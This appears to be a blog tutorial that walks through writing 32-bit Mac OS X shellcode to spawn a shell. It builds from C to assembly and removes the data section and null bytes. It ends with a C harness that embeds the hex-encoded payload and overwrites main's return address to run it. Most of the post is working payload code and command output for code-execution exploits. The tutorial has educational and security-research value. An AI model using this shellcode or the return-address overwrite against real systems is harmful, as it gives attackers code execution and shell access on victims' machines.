Spawning A Shell – Mac OS X Shellcode

Continuing my foray into the world of reverse engineering and program analysis, I have spent some time lately looking at shellcode.  For the uninitiated, shellcode refers to the small piece of code used as the payload when exploiting a software vulnerability; it got its name because it usually spawns a shell for the attacker to use.  In this post I will show you the process of creating shellcode on Mac OS X, so let’s get started!

Before you do anything, you need an idea of what you want your shellcode to do.  For this post I have decided to develop shellcode that spawns a shell on OS X.  Also worth noting is that this shellcode is written for 32-bit x86.

Step 1: Write The Corresponding C Code

When I write shellcode I like to try and write the corresponding C code first.  This may seem like a waste of time because the shellcode should be simple; however, I’ve found it acts as a guide when writing the shellcode because I can read the high-level interpretation quickly and keep track of where I am in the code.

#include <unistd.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char *execve_argv[2];

    execve_argv[0] = "/bin/sh";
    execve_argv[1] = NULL;

    execve(execve_argv[0], execve_argv, NULL);
    exit(0);
}

 

There isn’t much to this program; all it does is call execve() and spawn a shell.  Note that the call to exit() isn’t strictly necessary: on success execve() replaces the current process image with the new one and never returns, so exit() only runs if execve() fails.  With our template code in place it is now time to convert it into assembly.
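To make the point about exit() concrete, here is a minimal sketch showing that execve() only hands control back when it fails. The helper name exec_or_errno is my own and is not part of the program above.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <unistd.h>

/* Hypothetical helper: try to exec `path` with no extra arguments.
 * On success this function never returns, because the process image
 * is replaced.  If it does return, execve() failed and errno says why. */
int exec_or_errno(const char *path)
{
    assert(path != NULL);

    char *const exec_argv[] = { (char *)path, NULL };

    execve(path, exec_argv, NULL);
    return errno;
}
```

Calling exec_or_errno("/bin/sh") would replace the caller with a shell, while a path that does not exist comes back with ENOENT.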

Step 2: Assembly Code

Our first version will just be a simple translation from the C code into assembly.  The only difference is that, rather than calling the C library routines, we will make direct system calls.  Mac OS X has a vast and complicated system call interface, with hundreds of calls and multiple mechanisms to trap to the kernel; however, for our purposes all we need to know is that the system call number must be placed in %eax, the function arguments are pushed onto the stack in right-to-left order, and the kernel can be entered using the int $0x80 instruction.  Below is the assembly code to spawn a shell.

 

1 .text
2 .globl start
3
4 start:
5 movl    $0x3b, %eax     # SYS_execve
6
7 leal    path, %ebx      # Place address of path in %ebx
8 movl    %ebx, (args)    # Set pointer to path as first element in args
9
10 leal    args, %ecx      # Place address of args in %ecx
11
12 pushl   $0x0            # envp (null)
13 pushl   %ecx            # args
14 pushl   %ebx            # path
15
16 pushl   $0x0            # stack adjustment
17 int     $0x80           # trap
18
19 movl    $0x1, %eax      # SYS_exit
20
21 pushl   $0x0            # exit value
22
23 pushl   $0x0            # stack adjustment
24 int     $0x80           # trap
25
26 .data
27
28 path:   .asciz "/bin/sh"
29
30 args:   .long 0, 0      # two 32-bit slots: argv[0] and the terminating null

 

As mentioned above, the system call number must be placed in %eax.  In our program this is done on line 5 for the execve() call and on line 19 for the exit() call.  You can obtain these numbers from the file /usr/include/sys/syscall.h on a machine running Mac OS X.  The next trick is to get the proper addresses for the path and argv arguments to execve(); we do this on lines 7-10.  With all of this in place, all we need to do is push our arguments and trap to the kernel.  Notice that immediately before trapping we push another value onto the stack.  This is because OS X follows the BSD convention in which the trap is normally issued from inside a C library wrapper function, so the kernel expects the return address pushed by the call to that wrapper to sit on top of the stack, just before the arguments.  Since we aren’t performing this call, we must push a dummy value onto the stack so that our arguments are in the proper place when the interrupt is handled.  Once we finish this for execve() we simply rinse and repeat for exit().
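The effect of the push order can be sketched with a toy model of a downward-growing stack. Everything here (toy_stack, toy_push, toy_push_execve, and the addresses used) is invented for illustration; it models the layout only and does not touch real process memory.

```c
#include <assert.h>
#include <stdint.h>

/* Toy model of a 32-bit stack that grows toward lower indices. */
struct toy_stack {
    uint32_t mem[16];
    int sp;                 /* index of the current top of stack */
};

void toy_init(struct toy_stack *s)
{
    s->sp = 16;             /* empty stack: one past the last slot */
}

void toy_push(struct toy_stack *s, uint32_t value)
{
    assert(s->sp > 0);      /* no room left would be an overflow */
    s->mem[--s->sp] = value;
}

/* Push execve()'s arguments right to left, then the padding word,
 * mirroring lines 12-16 of the assembly listing above. */
void toy_push_execve(struct toy_stack *s, uint32_t path, uint32_t argv)
{
    toy_push(s, 0);         /* envp (null) */
    toy_push(s, argv);      /* argv */
    toy_push(s, path);      /* path */
    toy_push(s, 0);         /* stack adjustment */
}
```

Reading upward from the top of the stack after toy_push_execve() gives the padding word, path, argv, and envp, which is the layout a function would see after a call, with the padding standing in for the return address.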

Regarding our .data section, we only need entries for our path string and the argv array.  I’ve used the .asciz directive because it saves me from having to manually add a null byte to our string.  To create the argv array we start by reserving two 32-bit words of space; we then copy the address of the path string into the first word and leave the second word set to null.

This code can be compiled and run as follows:

dean@BigBertha:~/shellcode $ as -arch i386 -o execve_simple.o execve_simple.s
dean@BigBertha:~/shellcode $ ld -arch i386 -o execve_simple execve_simple.o
dean@BigBertha:~/shellcode $ ./execve_simple
sh-3.2$ exit
exit
dean@BigBertha:~/shellcode $

Take note of the usage of the -arch i386 option.  This instructs the assembler and linker to use the i386 architecture (calling conventions, register names, available instructions, etc.) as opposed to the default setting on Mac OS X, which is 64-bit x86.

So, that’s pretty cool! We have successfully written a program in assembly that spawns a shell for us! Now, how to take this code and create proper shellcode?

Step 3: Removing The .data Section

Let’s tackle the easy part first and start by removing the .data section from our program.  To do this, yet still have the data available to us, we will move our data onto the stack instead.  This can be done by first writing our string to the stack and then doing a little pointer manipulation to set up the argv array.

1 .text
2 .globl start
3
4 start:
5 movl    $0x3b, %eax     # SYS_execve
6
7 pushl   $0x0068732f     # place '/bin/sh' on
8 pushl   $0x6e69622f     # the stack
9 movl    %esp, %ebx      # save pointer to string
10
11 pushl   $0x0            # argv terminating null pointer
12 pushl   %ebx            # pointer to path
13 movl    %esp, %ecx      # save pointer to argv
14
15 pushl   $0x0            # envp (null)
16 pushl   %ecx            # argv (on stack)
17 pushl   %ebx            # path (on stack)
18
19 pushl   $0x0            # stack adjustment
20 int     $0x80           # trap
21
22 movl    $0x01, %eax     # SYS_exit
23 pushl   $0x0            # exit return code
24 pushl   $0x0            # stack adjustment
25 int     $0x80           # trap

 

The first thing to notice is that lines 7-8 write the string ‘/bin/sh’ to the stack.  Because the stack grows downward and x86 is little-endian, the second half of the string (‘/sh’ plus its terminating null) is pushed first, followed by ‘/bin’, so the bytes end up in memory in the right order.  Unfortunately, having the string on the stack (and out of a .data section) is only part of the game; we also need a pointer to the string in both the argv array and the first parameter to execve().  To do this, as seen on line 9, we copy the stack pointer (after pushing the string) into another register that we can use later on, effectively getting us a pointer to our string!  Lines 11-13 are similar; however, they set up the argv array for us instead of pushing a string.  Aside from using different registers, the rest of our program is very similar to our original implementation.
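If you want to derive the two immediates on lines 7-8 yourself, the following sketch packs four characters into the 32-bit value that, once pushed on a little-endian machine, puts them in memory in their original order. The function name pack_le32 is an assumption of mine, not something from the listing.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Pack four bytes into a 32-bit immediate so that bytes[0] ends up at
 * the lowest address when the value is stored little-endian. */
uint32_t pack_le32(const unsigned char bytes[4])
{
    assert(bytes != NULL);

    return (uint32_t)bytes[0]
         | ((uint32_t)bytes[1] << 8)
         | ((uint32_t)bytes[2] << 16)
         | ((uint32_t)bytes[3] << 24);
}
```

Feeding it "/bin" gives 0x6e69622f, and feeding it "/sh" together with its terminating null gives 0x0068732f, matching the two pushl instructions.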

Step 4: Removing Null Bytes

At this point things become a little tedious as we must remove all null bytes from our code.  The reason for this is that shellcode is frequently injected as a C string, so any null byte would be treated as the end of the string and everything after it would never be copied.
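As a rough illustration of the problem, the sketch below models how many bytes of a code buffer would survive a string-style copy such as strcpy(). The function name is hypothetical, and it only measures the buffer rather than performing a real copy.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Number of leading bytes a string copy would carry over: everything
 * up to, but not including, the first null byte.  If the buffer has no
 * null byte, all `len` bytes survive. */
size_t bytes_surviving_string_copy(const unsigned char *code, size_t len)
{
    assert(code != NULL);

    const unsigned char *nul = memchr(code, 0, len);
    return nul ? (size_t)(nul - code) : len;
}
```

For an instruction such as movl $0x3b, %eax, which assembles to b8 3b 00 00 00, only the first two bytes would make it across.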

To find the null bytes, first assemble and link the program, then use otool -t to dump the text section and look for any 00 bytes.  For example, we get the following with our previous code sample.

dean@BigBertha:~/shellcode $ otool -t execve_no_data
execve_no_data:
(__TEXT,__text) section
00001f84 b8 3b 00 00 00 68 2f 73 68 00 68 2f 62 69 6e 89
00001f94 e3 6a 00 53 89 e1 6a 00 51 53 6a 00 cd 80 b8 01
00001fa4 00 00 00 6a 00 6a 00 cd 80

Here we see that there are three consecutive null bytes beginning at address 0x1f86, which correspond to the 32-bit immediate of the move on line 5 in our last code sample.  To get rid of these null bytes we can begin by clearing %eax to 0 using XOR and then copying 0x3b into the low byte of the register (lines 14-15 below).  Rather than going through each null byte I’ll leave that as a bit of fun for you :)  Once you’ve made all the changes you should end up with code that looks something like the following program.

1 /* Shellcode to spawn a shell on OS X.  We can't use the 'traditional'
2 * technique of addressing relative to a call site in the .text because
3 * OS X is smart enough to know that it should not allow code to be modified
4 * in that section.
5 *
6 * Our new technique is to place all the data on the stack and manipulate it
7 * there, then simply read it from the stack.
8 */
9
10 .text
11 .globl start
12
13 start:
14 xorl    %eax, %eax      # clear %eax
15 movb    $0x3b, %al      # SYS_execve
16
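17 xorl    %edx, %edx      # clear %edx
18 movl    $0x68732f01, %edx   # '/sh' plus a 0x01 filler byte
19 shrl    $0x08, %edx     # shift the filler out, leaving '/sh\0'
20
21 pushl   %edx            # second half of the string: '/sh\0'
22 pushl   $0x6e69622f     # first half of the string: '/bin'
23 movl    %esp, %ebx      # save pointer to string
24
25 xorl    %edx, %edx      # %edx = 0, used wherever a null is needed
26
27 pushl   %edx            # argv terminating null pointer
28 pushl   %ebx            # pointer to path
29 movl    %esp, %ecx      # save pointer to argv
30
31 pushl   %edx            # envp (null)
32 pushl   %ecx            # argv (on stack)
33 pushl   %ebx            # path (on stack)
34
35 pushl   %edx            # stack adjustment
36 int     $0x80           # trap
37
38 movb    $0x01, %al      # SYS_exit
39 pushl   %edx            # exit return code
40 pushl   %edx            # stack adjustment
41 int     $0x80           # trap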

 

As usual you can compile and test this to make sure it still works as intended.
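The shift trick on lines 18-19 of the listing can be checked with a little arithmetic. The sketch below uses helper names of my own (has_null_byte, add_filler, drop_filler) and assumes the wanted value has a zero top byte, as ‘/sh’ plus its terminator does.

```c
#include <assert.h>
#include <stdint.h>

/* Returns 1 if any of the four bytes of `value` is zero. */
int has_null_byte(uint32_t value)
{
    for (int i = 0; i < 4; i++) {
        if (((value >> (8 * i)) & 0xffu) == 0)
            return 1;
    }
    return 0;
}

/* Shift the wanted value up one byte and put 0x01 in the low byte,
 * producing the immediate loaded on line 18. */
uint32_t add_filler(uint32_t wanted)
{
    assert((wanted >> 24) == 0);   /* the top byte is lost by the shift */
    return (wanted << 8) | 0x01u;
}

/* The effect of `shrl $0x08, %edx` on line 19: the filler falls off
 * the bottom and a zero byte is shifted in at the top. */
uint32_t drop_filler(uint32_t encoded)
{
    return encoded >> 8;
}
```

Here add_filler(0x0068732f) yields 0x68732f01, which contains no null bytes, and drop_filler() turns it back into 0x0068732f at run time.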

Step 5: Testing Our Code

For this last part we want to see our code in action, being executed on the stack of a simple program.  Our test program is as follows:

1   #include <stdlib.h>
2
3   char *sc = "\x31\xc0\xb0\x3b\x31\xd2\xba\x01\x2f\x73\x68\xc1\xea\x08\x52\x68"
4              "\x2f\x62\x69\x6e\x89\xe3\x31\xd2\x52\x53\x89\xe1\x52\x51\x53\x52"
5              "\xcd\x80\xb0\x01\x52\x52\xcd\x80";
6
7   int main(int argc, char **argv)
8   {
9     int *mret;
10    mret = (int *)&mret + atoi(argv[1]);
11    *mret = (int)sc;
12  }

 

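Lines 3-5 of this code contain our shellcode; it’s just written in hex rather than human-readable mnemonics.  The rest of the program creates a variable on the stack, takes the address of that variable, adds a user-supplied offset (counted in 4-byte words and passed as the first command-line argument), and then writes the address of our shellcode into (hopefully) the location used to store the return address of main().  With the address of our shellcode placed there, our code should be executed when main() returns, resulting in a shell being spawned.  Since the shellcode is 32-bit, the test program must also be built as a 32-bit binary, and the right offset depends on the compiler and its options, so expect to try a few small values.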
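Typing the escapes by hand from otool output is error-prone, so a small formatter can help. This is only a sketch; the function name format_as_escapes and its interface are my own invention.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Write `len` bytes of machine code into `out` as "\xNN" escapes.
 * Returns the number of characters written (not counting the
 * terminator), or -1 if `out` is too small. */
int format_as_escapes(const unsigned char *code, size_t len,
                      char *out, size_t out_size)
{
    size_t used = 0;

    assert(code != NULL && out != NULL);

    if (out_size == 0)
        return -1;
    out[0] = '\0';

    for (size_t i = 0; i < len; i++) {
        if (out_size - used < 5)      /* 4 characters plus terminator */
            return -1;
        snprintf(out + used, out_size - used, "\\x%02x", code[i]);
        used += 4;
    }
    return (int)used;
}
```

Given the first four bytes of the shellcode (31 c0 b0 3b), it produces the text \x31\xc0\xb0\x3b, ready to paste between double quotes.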
